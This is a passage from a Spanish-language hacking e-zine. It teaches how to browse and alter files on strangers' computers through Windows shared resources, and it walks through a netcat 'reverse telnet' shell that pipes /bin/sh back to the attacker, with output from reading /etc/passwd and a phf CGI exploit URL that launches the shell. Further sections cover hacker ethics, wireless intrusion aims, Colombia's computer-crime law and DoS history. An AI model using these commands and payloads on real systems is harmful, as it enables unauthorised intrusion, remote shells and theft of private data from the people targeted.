Mquina con recursos compartidos Si notaron, la imagen anterior muestra el nombre de la mquina (lado izquierdo) y el nmero raro (lado derecho) el cual indica que s comparte recursos (el nmero 20 indica eso). Lo siguiente por hacer es ver qu recursos comparte nuestra vctima, ejem, quiero decir cliente. Deberemos escribir: NET VIEW IP_Maquina donde IP_Maquina es la IP de la mquina conectada, en este caso tomaremos el siguiente ejemplo NET VIEW 222.222.222.222. Les acaba de mostrar los recursos que dicha mquina comparte (en este caso C, Documentos C, F y Mis documentos Audio. Ver siguiente imagen:

Recursos que comparte la mquina objetivo. Ya viendo los recursos que comparte, procedemos a acceder a la mquina,(Inicio-->Ejecutar-->Y escribimos \\IP_Maquina donde IP_Maquina es la IP de la mquina objetivo. Ejemplo: \\222.222.222.222 y presionamos Aceptar. Ver siguiente imagen:

En el cuadro Ejecutar escribimos \\IP_Maquina Tardar un poco en aparecer una ventana con los recursos que comparte, pero aparecer, so se los aseguro (a menos que esta maquina se halla desconectado). A partir de aqu es cuestin de que den doble clic sobre uno de los recursos y comiencen a explorar la pc de la victima. Ver siguiente imagen:

Mquina remota con recursos compartidos. Hay veces en las que la aplicacin IPScan mostrar informacin de NETBIOS y hasta en la consola de MS-DOS les mostrar el tan buscado nmero 20 de los nmeros raros de la derecha, pero que al momento de hacer NET VIEWIP_Maquina les muestra un error que dice No se ha encontrado la ruta de acceso a la red. Bueno, esto se debe a que pudo ser que el usuario se desconect o que simplemente debers escribir NET USE \\IP_Maquina o tambin NET VIEW \\IP_Maquina (noten las dos barras invertidas). En caso de que ninguna de estas opciones funcione, recomendamos que cambien de mquina o busquen una mejor forma de acceder a ellas...(Pap Gates les dice cmo en su pgina). Estando dentro: Qu podemos hacer? Las cosas que se podrn hacer dependern de los recursos compartidos y de los permisos de lectura/escritura establecidos en dichos recursos. Todo lo contrario a lo anterior si se accede a una mquina con recursos compartidos y con privilegios de escritura/lectura, pues podrn copiar, eliminar, modificar, renombrar o esconder archivos con toda la libertad del

mundo. Cabe mencionar que cualquier proceso llevado a cabo en la mquina remota ser exageradamente lento.

Qu es Telnet? Es un protocolo, es decir un programa que permite la conexion remota entre un servidor (servidor telnet) y uno o varios clientes (terminales) que son el o los PC's que se conectan a ese servidor usando un nombre y una contrasea. Las diferencias principales estan en que no tienen un entorno grafico ya que la conexion y las acciones como copiar, cambiar de ficheros cambiar de directorios y muchas otras se realizan en modo consola es decir un entorno no grafico similar al del MS DOS, otra caracteristica es la de hacer el "logeado" o autentificacion de usuario llevando la peticion al servidor en modo de texto plano, quiere decir que los datos no viajan encritptados y son faciles de capturar para poder ingresar a una maquina con el nombre y pass de otro usuario, por lo cual se dejo de utilizar hace algunos aos y se remplazo por SSH que seria una version mejorada de telnet por la encriptacion de datos que maneja

al pasar informacin.... Como configurar a nuestro PC para que sea un servidor TELNET? - Primero entra a Inicio - Panel de Control - Herramientas - Administrativas Servicios.

Veras que hay varios bajas y buscas "Telnet" le haces dos clic's y veras en Tipo de Inicio = Deshabilitado lo cambias por Automatico quiere decir que se iniciara cada vez que el windows se cargue.

Luego te vas a Iniciar Sesion y le haces click a "Esta Cuenta" ahi pones el nombre de un Adminitrador de tu PC ya sea el tuyo o puedes crear otro en Inicio - Panel de Control - Cuentas de Usuario y creas uno nuevo para Telnet.

La contrasea puedes colocarla tanto en la Cuenta de Usuario como en Inicar sesion en la Pestaa de Propiedades de Telnet, o simplemente en Inicar sesion en la Pestaa de Propiedades de Telnet da igual, lo que nos interesa es que la contrasea este en La configuracion de TELNET. Ahora esta cuenta que creaste te sirve para que desde pc remoto puedas configurar las opciones de TELNET es decir inicios de sesion, numero de intentos fallidos en la conexion de un usuario cliente el puerto que utilizaras para la conexion telnet, es decir una cuenta de ADMINISTRADOR telnet. En mi caso cree un adminsitrador llamado "Telnet" para agregarlo a Inicar Sesion. Si solo quieres conectarte no es necesario este paso de Iniciar sesion solo nececitas tener una cuenta en Cuentas de Usuaruios del Panel de Control y podras ingresar cono ese nombre y contrasea. Luego de hacer esto reinicias tu PC y cuando cargue de nuevo windows.

Ahora vamos Inicio --- ejecutar --- cmd y entraras a la consola de MS DOS ahi pulsas "tlntadmn" sin comillas y te saldra lo siguiente: Si has hecho algo mal durante el proceso te aparecera el siguiente mensaje:

Si ha salido todo correctamente. Ya tienes tu servidor Telnet, ahora puedes configurar algunos parametros con comandos de tlntadmn como ser: Para administrar un equipo que ejecuta el servidor Telnet Sintaxis: tlntadmn [\\servidorRemoto] [start] [stop] [pause] [continue] [-u nombreDeUsuario-p contrasea] Parmetros \\ servidorRemoto Especifica el nombre del servidor remoto que desea administrar. Si no se especifica un servidor, se utilizar el servidor local. start Inicia el servidor Telnet. stop Detiene el servidor Telnet. pause Interrumpe el servidor Telnet. continue Reanuda el servidor Telnet. -u nombreDeUsuario -p contrasea Especifica las credenciales administrativas del servidor remoto que desea administrar. Este parmetro es necesario

si desea administrar un servidor remoto en el que no haya iniciado una sesin con credenciales administrativas. /? Muestra Ayuda en el smbolo del sistema. Para administrar sesiones Telnet: Sintaxis tlntadmn [\\servidorRemoto] [-s] [-k{IdDeSesin | all}] [-m {IdDeSesin | all} "mensaje"] Parmetros \\ servidorRemoto Especifica el nombre del servidor remoto que desea administrar. Si no se especifica un servidor, se utilizar el servidor local. -s Muestra las sesiones Telnet activas. -k{IdDeSesin | all} Termina sesiones. Escriba el identificador de sesin para terminar una sesin especfica o escriba all para terminar todas las sesiones. -m {IdDeSesin | all} "mensaje" Enva un mensaje a una o varias sesiones. Escriba el identificador de sesin para enviar un mensaje a una sesin especfica o escriba all para enviar un mensaje a todas las sesiones. Escriba el mensaje que desea enviar entre comillas (es decir, "mensaje"). /? Muestra Ayuda en el smbolo del sistema. Para establecer el dominio predeterminado en un equipo que ejecuta el servidor Telnet: Sintaxis tlntadmn [\\servidorRemoto] config [dom=nombreDeDominio] [u nombreDeUsuario-p contrasea] Parmetros \\ servidorRemoto Especifica el nombre del servidor remoto que desea administrar. Si no se especifica un servidor, se utilizar el servidor local. dom= nombreDeDominio Especifica el dominio que desea convertir en el dominio predeterminado. -u nombreDeUsuario -p contrasea Especifica las credenciales administrativas del servidor remoto que desea administrar. Este parmetro es necesario si desea administrar un servidor remoto en el que no haya iniciado una sesin con credenciales administrativas. /? Muestra Ayuda en el smbolo del sistema.

Ejemplos Para hacer de Server1 el dominio predeterminado en el servidor local, escriba: tlntadmn config dom=Server1 Para asignar la tecla Alt en un equipo que ejecuta el servidor Telnet Sintaxis tlntadmn [\\servidorRemoto] config [ctrlakeymap={yes | no}] [-u nombreDeUsuario-p contrasea] Parmetros \\ servidorRemoto Especifica el nombre del servidor remoto que desea administrar. Si no se especifica un servidor, se utilizar el servidor local. ctrlakeymap={yes | no} Especifica si desea que el servidor Telnet interprete CTRL+A como ALT. Escriba yes para asignar la tecla de mtodo abreviado o no para impedir la asignacin. -u nombreDeUsuario -p contrasea Especifica las credenciales administrativas del servidor remoto que desea administrar. Este parmetro es necesario si desea administrar un servidor remoto en el que no haya iniciado una sesin con credenciales administrativas. /? Para establecer el nmero mximo de conexiones en un equipo que ejecuta el servidor Telnet: Sintaxis tlntadmn [\\servidorRemoto] config [maxconn=enteroPositivo] [-u nombreDeUsuario-p contrasea] Parmetros \\ servidorRemoto Especifica el nombre del servidor remoto que desea administrar. Si no se especifica un servidor, se utilizar el servidor local. maxconn= enteroPositivo Establece el nmero mximo de conexiones. Este nmero debe especificarse con un entero positivo que sea ms pequeo que 10 millones. -u nombreDeUsuario -p contrasea Especifica las credenciales administrativas del servidor remoto que desea administrar. Este parmetro es necesario si desea administrar un servidor remoto en el que no haya iniciado una sesin con credenciales administrativas. /? Muestra Ayuda en el smbolo del sistema. Para establecer el nmero mximo de intentos de inicio de sesin errneos en un equipo que ejecuta el servidor Telnet:

Sintaxis tlntadmn [\\servidorRemoto] config [maxfail=enteroPositivo] [-u nombreDeUsuario-p contrasea] Parmetros \\ servidorRemoto Especifica el nombre del servidor remoto que desea administrar. Si no se especifica un servidor, se utilizar el servidor local. maxfail= enteroPositivo Establece el nmero mximo de intentos de inicio de sesin errneos que se le permite a un usuario. Este nmero debe especificarse con un entero positivo que sea ms pequeo que 100. -u nombreDeUsuario -p contrasea Especifica las credenciales administrativas del servidor remoto que desea administrar. Este parmetro es necesario si desea administrar un servidor remoto en el que no haya iniciado una sesin con credenciales administrativas. /? Muestra Ayuda en el smbolo del sistema. Para establecer el modo de operacin en un equipo que ejecuta el servidor Telnet Sintaxis tlntadmn [\\servidorRemoto] config [mode={console | stream}] [-u nombreDeUsuario-p contrasea] Parmetros \\ servidorRemoto Especifica el nombre del servidor remoto que desea administrar. Si no se especifica un servidor, se utilizar el servidor local. mode={console | stream} Establece el modo de operacin. -u nombreDeUsuario -p contrasea Especifica las credenciales administrativas del servidor remoto que desea administrar. Este parmetro es necesario si desea administrar un servidor remoto en el que no haya iniciado una sesin con credenciales administrativas. /? Muestra Ayuda en el smbolo del sistema. Para establecer el puerto Telnet en un equipo que ejecuta el servidor Telnet Sintaxis tlntadmn [\\servidorRemoto] config [port=valorEntero] [-u nombreDeUsuario-p contrasea] Parmetros \\ servidorRemoto Especifica el nombre del servidor remoto que desea administrar. Si no se especifica un servidor, se utilizar el servidor local. port= valorEntero

Establece el puerto Telnet. Debe especificar el puerto con un entero ms pequeo de 1.024. -u nombreDeUsuario -p contrasea Especifica las credenciales administrativas del servidor remoto que desea administrar. Este parmetro es necesario si desea administrar un servidor remoto en el que no haya iniciado una sesin con credenciales administrativas. /? Muestra Ayuda en el smbolo del sistema. Para establecer los mtodos de autenticacin en un equipo que ejecuta el servidor Telnet Sintaxis tlntadmn [\\servidorRemoto] config [sec=[{+ | -}ntlm][{+ | -}passwd]] [-u nombreDeUsuario-p contrasea] Parmetros \\ servidorRemoto Especifica el nombre del servidor remoto que desea administrar. Si no se especifica un servidor, se utilizar el servidor local. sec=[{+ | -}ntlm][{+ | -}passwd] Especifica si desea utilizar NTLM, una contrasea o ambos para autenticar intentos de inicio de sesin. Para utilizar un tipo determinado de autenticacin, escriba un signo ms (+) antes de ese tipo de autenticacin. Para impedir el uso de un determinado tipo de autenticacin, escriba un signo menos (-) antes de ese tipo de autenticacin. -u nombreDeUsuario -p contrasea Especifica las credenciales administrativas del servidor remoto que desea administrar. Este parmetro es necesario si desea administrar un servidor remoto en el que no haya iniciado una sesin con credenciales administrativas. /? Muestra Ayuda en el smbolo del sistema. Para establecer el tiempo de espera para sesiones de inactividad en un equipo que ejecuta el servidor Telnet: Sintaxis tlntadmn [\\servidorRemoto] config [timeout=hh:mm:ss] [-u nombreDeUsuario-p contrasea] Parmetros \\ servidorRemoto Especifica el nombre del servidor remoto que desea administrar. Si no se especifica un servidor, se utilizar el servidor local. timeout= hh : mm : ss Establece el perodo de tiempo de espera en horas, minutos y segundos. -u nombreDeUsuario -p contrasea Especifica las credenciales administrativas del servidor

remoto que desea administrar. Este parmetro es necesario si desea administrar un servidor remoto en el que no haya iniciado una sesin con credenciales administrativas. /? Muestra Ayuda en el smbolo del sistema. Doy un ejemplo aqui de como configurar el puerto que utilizara telnet para su conexion:

Ahora, cambiamos el puerto por defecto 23, al puerto 100. El puerto que utilize TelNet debe ser menor a 1024. Ahora veran en en este ejemplo hemos cambiado el puerto 23 al 100, entonces para probar que funciona nuestro servidor Telnet ejecutamos "TelNet 127.0.0.1 100" Por que? 127.0.0.1 es la IP "interna" o "localhost" que tienen todos los Pc's por defecto, entonces, la utilizamos para hacer una autoconexion con nosotros mismos para ver si esta "bien" nuestro servidor Telnet. 100 es el puerto que cambiamos al servidor Telnet. Nos aparecera una imagen

Tecleamos "s" & precionamos ENTER. Vea imagen:

Los comandos que se utilizan para moverse en telnet tambien sirven para ftp, estan en escritos en UNIX, asi que aqui les dejo el enlace para que puedan ver que comandos les interesa saber como ser "get" "mget" que son los que sirven para descargar archivos de un pc remoto. UNIX: http://es.tldp.org/Tutoriales/UXO/uxo/ UNIX: http://www.manualesdeayuda.com/manuales/sistemasoperativos/unix/unix-avanzado-i--manejo-de-comandos01758.html Si hacen una Autoconexion, o en una LAN pueden utilizar comandos de MS DOS, como ser: cd, md, dir y muchos otros que te serviran para "moverte" en el disco duro de la victima. NOTA: En caso de querer comunicarnos desde una PC remoto, tendriamos que seguir la secuencia: Inicio - Ejecutar - Telnet "La IP publica del PC" 100, es decir la IP que (seria la que nos muestra en Internet cuando ingresamos a www.cualesmiip.com) Tambien existen programas para hacer intrusin de manera automatica, pero creemos que no es necesario hablar de ello.

Reverse Telnet 1- Qu es Reverse Telnet? Como su nombre indica, es una tecnica basada en Telnet, es decir, abrir una sesion remota entre una maquina y otra, pero al contrario que en otros ataques, en este caso, la maquina atacada "Target Host" sera la que nos haga Telnet a nosotros, esta tecnica tambien se le llama "Back Channel", y es muy util cuando queremos hacer Telnet a una maquina y no esta habilitado el puerto de Telnet. 2- Explicacion del Proceso, & Ejemplos El proceso de "Reverse Telnet" es simple, se trata de invertir el proceso de Telnet, es decir que en vez de iniciar la secion en nuestro PC & terminar en un servior remoto, lo que vamos a hacer es abrir unos puertos en nuestra maquina que actuaran de servidor, e iniciar un cliente en la maquina remota. Cmo habilitamos el pseudo-servidor en nuestra maquina? Recurrimos al nunca bien valorado NetCat, posiblemente una de las mejores herramientas las cuales se han inventado...Levantaremos dos puertos, uno para enviar datos & otro para recibir una terminal. nc -nvv -l -p 80 nc -nvv -l -p 25 Parametros: -n -vv -l -p Solo IPs numerica. Modo Mega-verbose. Listen mode. Espera a conexiones entrantes. Numero del puerto que queremos habilitar.

Luego de "levantar" nuestro servidor de Telnet en nuestra maquina (192.168.1.4), ahora lo que tenemos que hacer es iniciar la conexion desde la maquina remota, para eso escribimos el siguiente comando: telnet 192.168.1.4 80 | /bin/sh | telnet 192.168.1.4 25 Abrimos una conexion desde la maquina remota al puerto 80 de nuestra maquina, hacemos llegar la entrada de esta conexion a una shell (/bin/sh) mediante un pipe & redirigimos la salida de la shell mediante otro pipe a neustra nueva

maquina, al puerto 25, por donde vamos a recibir las respuestas. Ahora tenemos todo el tinglado montado, ahora solo falta que funcione, deberiamos tener lo siguiente en cada terminal: Terminal 1 - Puerto 80 - Envio de comandos -----------------------------------------[root@vaca netcat]# ./nc -nvv -l -p 80 listening on [any] 80 ... Terminal 2 - Puerto 25 - Recepcion de respuestas ----------------------------------------------[root@vaca netcat]# ./nc -nvv -l -p 25 listening on [any] 25 ... Si fuesemos capaces de ver lo que se ejecuta en la maquina remota veriamos lo siguiente... Target Host ----------[root@pollo netcat]# telnet 192.168.1.4 80 | /bin/sh | telnet 192.168.1.4 25 Trying 192.168.1.4... Connected to 192.168.1.4. Escape character is '^]'. /bin/sh: Trying: command not found /bin/sh: Connected: command not found /bin/sh: Escape: command not found Digo si fuesemos capaces porque lo normal seria que no lo veamos, sino para que montar este tinglado? Siguiente paso... Ejecutar comandos en la maquina remota, para hacer esto debemos enviar a traves de nuestra terminal con el netcat en el puerto 80, los comandos en un formato especifico, este formato es el siguiente: echo `comando_a_ejecutar parametros` veamos un ejemplo practico de esto, ejecutemos el tipico y deseado cat /etc/passwd y veamos que sucede

Terminal 1 - Puerto 80 - Envio de comandos -----------------------------------------[root@vaca netcat]# ./nc -nvv -l -p 80 listening on [any] 80 ... connect from (UNKNOWN) [192.168.1.2] 2144 echo `cat /etc/passwd` Terminal 2 - Puerto 25 - Recepcion de respuestas ----------------------------------------------[root@vaca netcat]# ./nc -nvv -l -p 25 connect from (UNKNOWN) [192.168.1.2] 2145 root:x:0:0:root:/root:/bin/bash bin:*:1:1:bin:/bin: daemon:*:2:2:dae mon:/sbin: adm:*:3:4:adm:/var/adm: lp:*:4:7:lp:/var/spool/lpd: sync:*:5:0:sync:/ sbin:/bin/sync shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown halt:*:7:0:halt:/sbi n:/sbin/halt mail:*:8:12:mail:/var/spool/mail: news:*:9:13:news:/var/spool/news: uucp:*:10:14:uucp:/var/spool/uucp: operator:*:11:0:operator:/root: games:*:12:1 00:games:/usr/games: gopher:*:13:30:gopher:/usr/lib/gopherdata: ftp:*:14:50:FTP User:/home/ftp: nobody:*:99:99:Nobody:/: xfs:!!:100:101:X Font Server:/etc/X11/ fs:/bin/false gdm:!!:42:42::/home/gdm:/bin/bash Listo, igual que hemos ejecutado ese Cat, podemos ejecutar cualquier comando bajo el ID con el que hayamos ejecutado el comando en la maquina remota. Si pensamos un poco, llegamos a la conclusion...De que sirve esto, si para ejecutar Telnet en la maquina remota tengo que tener acceso a ella? Si, pero existen tipos...Ya lo veremos. 3. Cuando utilizar reverse telnet. En el punto anterior no quedaba clara la utilidad de esta tecnica, si tenemos una maquina en la que tenemos acceso a un cgi-bin/phf/php mal configurado y que nos permita ejecutar algun comando desde el navegador, bien, ejecutamos el comando citado anteriormente tendremos una shell sin usuario y sin password, el ejemplo usando el bug del phf, que aun existe, seria el siguiente: http://www.targethost.com/cgibin/phf?Qalias=x$0a/bin/telnet/%20192.168.1.4%2080%20|%20/b in/sh%20|%20/bin/telnet%20192.168.1.4%2025

Ya tendriamos nuestra shell up&running, igualmente podemos utilizar exploits remotos que solo nos permiten ejecutar codigo en el servidor para poner en practica esta tecnica, en fin...pon algo de imaginacion. Porque utilizar precisamente esos puertos, osea 25 y 80, simple, si la maquina esta con firewall activado, es mas facil que tenga abiertos hacia fuera, puertos de servicio comunes, que puertos mas altos o que se usen menos. 4. Herramientas & Software Lo unico necesario para llevar a cabo este tecnica es NetCat & un nvagador, ms por supuesto, tu interes. Hemos hablado mucho de Hacking, tecnicas, entre ellas intrusin, ingenieria social & dems cosas interesantes, pero Qu es un Hacker, & como ser uno? Continua leyendo y lo sabras.

El wireless o comunicacin inalmbrica es el trmino utilizado para describir telecomunicaciones que utilizan ondas electromagnticas para comunicarse entre dispositivos sin necesidad de un medio fsico, es decir sin cables Ejemplos comunes de equipos wireless en uso hoy en da incluyen: Telfonos mviles, que permiten colectividad entre personas. El sistema de posicionamiento global (GPS), que permite que coches, barcos y aviones comprueben su localizacin en cualquier parte de la tierra. Perifricos de ordenador wireless, como el ratn, los teclados y las impresoras, que se pueden tambin conectar a un ordenador va wireless.

Telfonos inalmbricos, de ms corto alcance que los telfonos mviles. Mandos a distancia (para televisin, vdeo, puertas de garaje, etc.) y algunos sistemas de alta fidelidad. Monitores para bebs, estos dispositivos son unidades de radio simplificadas que transmiten/reciben dentro de una gama limitada. Televisin va satlite, permiten que los espectadores, desde casi cualquier parte, seleccionen entre centenares de canales. LANs wireless o flexibilidad y ordenadores. local rea networks, proporcionan fiabilidad para usuarios de

Introduccin al hacking Wireless El hacking es el arte de desarrollar nuevas tcnicas de ataque, estrategias de ataque, nuevas y mejores herramientas de seguridad mas no seguir los pasos de una receta (tutoriales) para lograr su cometido ya sea este de buenos o malos fines. No nos responsabilizamos por el uso que se le d a esta informacin, por que la intencin de esta revista no es ms que darles a conocer un poco ms sobre el amplio mundo del hacking y todas las sorpresas que podemos encontrar en este. Hacking Wireless Consiste en acceder a la red WLAN de otro usuario y utilizar su ancho de banda para conectarse a internet (es decir nos conectamos por el morro). Acceder a los recursos compartidos de los dems ordenadores de la red y sustraer datos confidenciales de todo tipo. Hacking una red con un router Consiste en ganar acceso a un ordenador que se encuentra detrs de una red y se conecta mediante un server/gateway/router (lo que sea) a internet. Sobre esto tambin estoy posteando as que si les interesa pueden mirar mis ltimos mensajes, e informarse de como funcionan las IPs en una red, la teora de ataque, mtodos para saltarse router y firewall (como conexiones inversas ya sea mediante netcat o troyanos de conexin inversa). Nota: Temas como esto, en los cuales no hemos profundizado, se ampliaran en la prxima E-zine.

Las preguntas ms frecuentes en la red: Qu es un hacker? Y cmo ser uno? Para ser un HACKER (maldita palabra mal entendida por unos y peor utilizada por otros) solo hace falta dos cosas: curiosidad y medios, a partir de ahora la curiosidad deber ponerla USTED, porque los medio los facilitaremos NOSOTROS. En las siguientes lneas descubrimos como podremos seguir nuestros objetivos y definimos algunas de las palabras que ms han sido violadas y retorcidas en su significado. Hacker: Este termino ha sufrido a lo largo de su corta historia una horrible conspiracin perpetrada por la ignorancia de los medios, eso que personalmente llamo "periodismo de telediario" (en clara alusin a los ridculos artculos que no hacen mas que intoxicar nuestra percepcin de las cosas e insultar nuestra inteligencia.) Este tipo de periodismo unido a "otros poderes", desde los monopolios que deben justificar su incompetencia hasta los gobiernos que deben justificar sus intereses ocultos pasando por la industria del cine (normalmentedemonlgica) y los medios informativos "de masas".

Pues bien, HACKER no es ms que una persona que posee conocimientos avanzados sobre una materia en concreto, normalmente relacionados con la tecnologa aunque ni mucho menos limitado a ello. Ponen sus aptitudes al servicio de un nico objetivo: EL CONOCIMIENTO. Desean conocer el funcionamiento de "las masas" y no encuentran lmites en sus caminos ms que su propia curiosidad. No se dedican a destruir ni a causar estragos entre sus "victimas", no se dedican a robar ni a chantajear ni a regodearse de sus "conquistas", muy al contrario suelen advertir a terceros de las debilidades de sus sistemas y, desgraciadamente, esos "terceros" en un lugar de agradecerles su aviso se dedican a denunciarlos o perseguirlos... aunque no siempre es as, por supuesto, muchas compaas y gobiernos han aprendido lo valiosos que son los HACKERS y ahora algunos son colaboradores (o empleados) de estos. BILL GATES es un hacker (el papa ventanas), como Linus Torvalds (el papa Linux) o Grace Hooper (la Almirante, creadora del Lenguaje COBOL), los autores del COREWAR Robert Thomas Morris, Douglas McIlroy y Victor Vysottsky (precursores de los creadores de virus informticos), Fred Cohen (el primer investigador y autor de los virus de la historia), Dennis Ritchie y Ken Thompson ("hacedores" del Lenguaje C y cocreadores del SO UNIX), Gary Kildall (autor del sistema operativo CMP y CPM/86), Tim Paterson (autor del Quick y Dirty DOS), Morris (autor del virus "The tour of the Worm"), Kevin Mitnick (el mas buscado por el FBI), Phiber Optik (lder juvenil convertido en smbolo de los hackers), Richard Stallman (impulsor del "software gratuito" y GNU), Johan Helsingius (primer conductor de un Remail Annimo), Chen IngHou (autor del virus CIH Chernobyl-), Sir Dyistic (creador del Back Orifice), David L- Smith (virus Melissa), Reonel Raomez (virus LoveLetter), Vladimir Levin (Robo electrnicamente 10 millones de dlares al Citibank), y muchos ms. Como? Pero no hemos dicho que los hackers no cometen delitos? Pues NO, vuelve a leer su definicin...pero claro, de todo hay en la vida del seor, y al igual que hay delincuentes entre el clero hay hackers que en un momento u otro han -cado- en la ilegalidad nadie es perfecto!!!...y Bill Gates es un HACKER? Por supuesto, solo tienes que leerte su biografa. Sorprendido? Sigue leyendo... Los primeros en desautorizar los espectaculares incidentes de seguridad informtica suelen ser, precisamente, los hackers. Pioneros de la red y sus habitantes ms arraigados, Internet est hecha a imagen y semejanza de su filosofa (sistemas abiertos, interoperatividad, hacer real la ciencia-ficcin). Cmo alguien puede creer que disfrutemos destruyndola? se lee, una y otra vez, en las listas de correo y otras zonas electrnicas donde se comunican.

Entre ellos -pocas mujeres-, est comnmente aceptado que no es considerado hacker quien cambia una pgina Web o daa ordenadores. En la mayora de ocasiones, el atacante slo ha necesitado algunos conocimientos de informtica y leerse el manual de los programas que hacen todo el trabajo, disponibles en Internet y escritos por los autnticos hackers. Un hacker es, segn el reputado diccionario de jerga informtica "Jargon File", "[originariamente, alguien que hace muebles con un hacha] Persona que disfruta explorando los detalles de los sistemas programables y cmo forzar sus capacidades, opuesto a la mayora de usuarios, que prefieren aprender slo lo mnimo necesario". La seguridad de programas es slo uno de los temas que interesan a estos expertos informticos, otros se especializan en "hardware", lneas telefnicas, televisin, etc. Muchos trabajan como administradores de sistemas, programadores, consultores, profesores o son estudiantes de informtica y telecomunicaciones, con suficiente tiempo para aprender, crear, liberar, sus verbos preferidos, surgidos de la llamada "tica hacker", una mezcla entre "hippie" y "ciberpunk", juegos de rol y sonrisas artificiales. Compartir informacin, programas, recursos. Aborrecer lo que suene a control y centralizacin. Buscar alternativas imaginativas a los problemas. No robar. No al vandalismo. S a la privacidad. La seguridad, junto a la construccin colaborativa de programas libres (proyectos Linux o FreeBSD), es el campo que ms auge est viviendo en el mundo hacker. La tica aqu consiste en monitorizar programas y mquinas de la red y avisar privadamente a quien tenga un sistema inseguro. Si no ha habido respuesta o si es de inters general, pasados unos das se enva el aviso a foros como BugTraq, ledo por todos los expertos en seguridad que se precien. All es frecuente ver a algunos de los ms conocidos hackers del planeta, como Mixter, el creador del programa de DDoS TFN2K, quien horas despus de los ataques en Yahoo! discuta tranquilamente sobre la repercusin de su invento. Sombras y luces del pas de las cbermaravillas, donde dicen que no se es hacker hasta que alguien as te describe. [Los hackers llaman a los autores de ataques automatizados "script-kiddies" (nios con programas), jvenes -de cabeza o de cuerpo- vndalos, a veces estudiantes con mucho tiempo, que monitorizan la red a la bsqueda de sistemas dbiles. Los asaltan con programas concebidos primariamente como herramientas de seguridad defensiva o de anlisis, que han encontrado en Internet, en lugares como Rootshell o Antionline. El manido lema de los hackers, "la informacin

debe ser libre", se convierte as en peligro potencial para quien est desprotegido. Aunque, en este mundo donde nada es lo que parece, no puede afirmarse categricamente que quien cambia una pgina Web o rompe un sistema sea siempre un chiquillo con poco seso. Hay tambin reputados hackers que alguna vez han practicado el llamado "hacktivismo", consistente en realizar acciones espectaculares, como entrar en los ordenadores del gobierno de Indonesia, por razones polticas o sociales. Pero no toda la comunidad est de acuerdo con la nueva moda del hacktivismo y muchos siguen teniendo claro que quien construye es un hacker y quien destruye, no. Para ste, han inventado nombres como script-kiddie, lamer (quien usa programas de los otros y no sabe escribir los suyos) o cracker (quien destruye sin razn, aunque entran tambin en esta categora los que rompen protecciones anticopia y algoritmos criptogrficos, a veces con buenas causas, como demostrar al mundo la fragilidad de los sistemas GSM o DVD). Los ltimos incidentes han despertado las voces, en la misma comunidad, discordantes con la tradicin de ofrecer repositorios de programas "peligrosos" en Internet y contra sus autores. El problema es decidir qu programas son ms malos que buenos y si normas restrictivas acabaran con ellos. Los mejores almacenes de programas no son fcilmente localizables, muchos no estn ni en la Web y el acceso es restringido a personas de confianza. Dicen que lo bueno que tiene Internet es que interpreta la censura como un error del sistema y la circunvala. Nunca nadie ha conseguido quitar algo de la red que no hayan nacido, al instante, diez nuevos sitios donde lo ofrecen.

Delito informtico, crimen genrico o crimen electrnico, que agobia con operaciones ilcitas realizadas por medio de Internet o que tienen como objetivo destruir y daar ordenadores medios electrnicos y redes de Internet. Sin embargo, las categoras que definen un delito informtico son an mayores y complejas y pueden incluir delitos tradicionales como el fraude, el robo, chantaje, falsificacin y la malversacin de caudales pblicos en los cuales ordenadores y redes han sido utilizados. Con el desarrollo de la programacin y de Internet, los delitos informticos se han vuelto ms frecuentes y sofisticados. Existen actividades delictivas que se realizan por medio de estructuras electrnicas que van ligadas a un sin numero de herramientas delictivas que buscan infringir y daar todo lo que encuentren en el mbito informtico: ingreso ilegal a sistemas, interceptado ilegal de redes, interferencias, daos en la informacin (borrado, daado, alteracin o supresin de data crdito), mal uso de artefactos, chantajes, fraude electrnico, ataques a sistemas, robo de bancos, ataques realizados por hackers, violacin de los derechos de autor, pornografa infantil, pedofilia en

Internet, violacin de informacin confidencial y muchos otros.

La Ley 1273 de 2009 cre nuevos tipos penales relacionados con delitos informticos y la proteccin de la informacin y de los datos con penas de prisin de hasta 120 meses y multas de hasta 1500 salarios mnimos legales mensuales vigentes. El 5 de enero de 2009, el Congreso de la Repblica de Colombia promulg la Ley 1273 Por medio del cual se modifica el Cdigo Penal, se crea un nuevo bien jurdico tutelado denominado De la Proteccin de la informacin y de los datos- y se preservan integralmente los sistemas que utilicen las tecnologas de la informacin y las comunicaciones, entre otras disposiciones. Dicha ley tipific como delitos una serie de conductas relacionadas con el manejo de datos personales, por lo que es de gran importancia que las empresas se blinden jurdicamente para evita incurrir en alguno de estos tipos penales. No hay que olvidar que los avances tecnolgicos y el empleo de los mismos para apropiarse ilcitamente del patrimonio de terceros a travs de clonacin de tarjetas bancarias, vulneracin y alteracin de los sistemas de cmputo para recibir servicios y transferencias electrnicas de fondos mediante manipulacin de programas y afectacin de los cajeros automticos, entre otras, son conductas cada vez ms usuales en todas partes del mundo. Segn la Revista Cara y Sello, durante el 2007 en Colombia las empresas perdieron ms de 6.6 billones de pesos a raz de delitos informticos. De ah la importancia de esta ley, que adiciona al Cdigo Penal colombiano el Ttulo VII BIS denominado "De la Proteccin de la informacin y de los datos" que divide en dos captulos, a saber: De los atentados contra la confidencialidad, la integridad y la disponibilidad de los datos y de los sistemas informticos y De los atentados informticos y otras infracciones. Ahora sabiendo que son los delitos informticos, veamos a la seguridad en accin

Los ataques de Denegacin de Servicio (DoS) eran tan viejos como Internet. Pero no parecan quitar el sueo a nadie, hasta que televisores de medio mundo mostraron a famosos servicios, como Yahoo! o E-Bay, fuera de combate. Este y otros incidentes, cada vez ms graves, abonan el campo de la seguridad informtica, para el que se auguran tiempos de cosecha. Mixter, el autor de un programa que, supuestamente, fue utilizado en los ataques contra Yahoo!, aseguraba, en una entrevista con ZDNet, que lo haba creado no como herramienta de destruccin sino para testear la seguridad de sistemas informticos. Un doble filo que se repite en toda la red, construida para sobrevivir a un ataque nuclear y, en cambio, frgil: "El problema real es la inseguridad que crean todas las mquinas vulnerables que hay en Internet, no la gente que las est atacando", avisaba Mixter.

